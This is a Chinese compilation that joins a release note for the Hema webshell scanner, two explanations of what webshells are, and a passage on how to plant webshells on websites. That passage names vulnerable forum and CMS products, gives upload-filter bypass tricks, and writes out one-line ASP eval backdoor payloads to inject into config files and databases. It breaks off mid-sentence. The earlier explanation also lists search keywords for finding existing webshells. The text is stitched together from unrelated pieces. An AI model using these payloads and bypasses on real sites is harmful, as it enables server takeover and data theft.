1. 河马WEBSHELL扫描器1.8.0
新版本河马WEBSHELL扫描器1.8.0发布,特此赠出4本《互联网安全建设从0到1》,参与方式请查阅文章末尾。
下载与更新
新用户访问shellpub.com,点击“立即使用”下载适合您的版本。
老用户更新Linux版本可直接升级。
Windows用户已接收到升级提醒,未收到者请至官网下载最新版覆盖安全安装。
功能更新
新增集成php深度解码器,此功能在1.6.x版本完成初步开发,现集成于在线查杀,经过多次迭代,新版本正式将此功能下放至本地客户端。使用深度解码器时,查杀速度较慢,建议先用常规模式进行快速查杀,再进行精准查杀。全新的查杀引擎2.0开发工作已启动,敬请期待。
如何使用深度模式
深度解码模式命令格式如下,示例动图展示了Linux系统下先用“scan”模式扫描,接着使用“deepscan”进行扫描,Windows用户可以在扫描按钮左侧勾选深度模式。
BUG修正与兼容性测试
如遇不兼容的发行版本问题,请及时与我们联系,联系方式在文章末尾。
常见问题解答
如在使用过程中遇到问题,请在文章下留言或加QQ:1494922137寻求帮助。
活动时间:2020年7月15日至7月29日
参与方式一:关注公众号“这里是河马”,转发本文并在公众号后台回复截图,将随机抽取2名幸运用户,每人赠书一本。
参与方式二:在活动期间内,向公众号回复消息(非文章留言),提出建议。选取两个最优建议的用户将获赠书籍,建议范围包括但不限于河马查杀系列产品改进建议、河马查杀严重BUG反馈、WEBSHELL混淆、绕过姿势、河马查杀明显的误报(不含疑似)。
请点击原文链接了解更多详情。
2. 什么是php webshell
webshell是web入侵的脚本攻击工具。简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。
为了更好理解webshell我们学习两个概念:
什么是“木马”?“木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。
什么是后门?大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。
webshell的优点
webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。
如何寻找webshel:
1,脚本攻击SQL注入
2,使用注入工具
3,在浏览器里打开网络,输入搜索关键词"在本页操作不需要FSO支持&"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果.
3. 自己网站怎么拿WEBSHELL
一、直接上传获得webshell
这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。
二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa|asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!
三、利用后台管理功能写入webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。
四、利用后台管理向配置文件写webshell
利用"""":""//"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",还有一种方法就是写上cnhacker at 263 dot net"%><%eval request(chr(35))%><%',这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马"%><%execute request("l")%><%',保存顶部栏目菜单参数设置成功后,我们就得到马地址http://网站/admin/rootclass_menu_config.asp。
五、利用后台数据库备份及恢复获得webshell
主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候,但是有asp系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。
六、利用数据库压缩功能
可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。
七、asp+mssql系统
这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单
4. 什么是 Webshell
webshell,一种web入侵的脚本攻击工具。
简单理解,webshell实质上是asp或php木马后门。黑客在攻占网站后,常将这些木马后门文件置于网站服务器web目录,与正规网页文件混杂。然后,黑客能通过web操作,借助木马后门对网站服务器实施控制,包括文件上传下载、数据库查看、任意程序命令执行等。
webshell,提供黑客远程控制网站服务器的便捷方式,通过web界面实现多种操作。这使得黑客无需直接登录服务器,仅需通过webshell界面即可操控,极大地便利了攻击过程,增加了防范难度。
webshell的存在,对于网站安全构成了重大威胁。一旦被黑客植入webshell,网站将可能遭受进一步的破坏和利用。因此,加强网站的安全防护,定期检查并清理webshell,对于维护网站稳定运行至关重要。
总之,webshell是黑客进行web入侵的重要工具,通过巧妙地在网站服务器中植入木马后门,实现对网站的远程控制。防范webshell攻击,需要网站管理员提高安全意识,实施有效的安全策略,确保网站的安全稳定运行。